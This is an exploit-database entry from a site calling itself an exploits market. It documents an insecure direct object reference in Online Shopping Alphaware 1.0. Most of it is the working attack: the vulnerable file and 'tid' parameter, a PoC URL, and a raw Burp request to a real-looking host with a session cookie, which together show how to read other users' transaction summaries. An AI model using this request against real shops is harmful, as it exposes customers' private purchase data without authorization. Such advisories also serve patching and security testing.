[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Online Shopping Alphaware 1.0 Insecure Direct Object Reference Vulnerability

Author
Edo Maland
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-34802
Category
web applications
Date add
06-08-2020
Platform
php
# Exploit Title: Online Shopping Alphaware 1.0  - 'Summary' Insecure Direct Object Reference (Authenticated)
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On Windows & Linux Server

# Vulnerability Details
# Description : See a summary of other people's transactions 
# Vulnerable file: summary.php
# Vulnerable parameter : 
  - tid

# PoC

URL : http://example.com/alphaware/summary.php?tid=[id] IDOR

# Burp Requests

GET /alphaware/summary.php?tid=[id] HTTP/1.1
Host: flymetothemoon.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=tokl2nlnjtjud32laqupj07sss
Upgrade-Insecure-Requests: 1

#  0day.today [2024-11-16]  #